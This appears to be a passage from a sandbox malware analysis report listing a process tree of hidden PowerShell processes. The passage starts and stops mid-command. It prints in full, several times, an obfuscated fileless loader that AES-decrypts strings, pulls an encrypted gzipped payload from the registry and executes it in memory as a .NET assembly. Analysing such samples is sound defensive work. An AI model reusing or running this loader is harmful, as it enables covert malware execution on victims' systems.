$mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        24⤵
        
        PID:8928
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(9124).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        24⤵
        Hide Artifacts: Hidden Window
        
        PID:8480
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(9124).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        24⤵
        Hide Artifacts: Hidden Window
        
        PID:4240
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(9124).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        24⤵
        Hide Artifacts: Hidden Window
        
        PID:8228
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(9124).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = 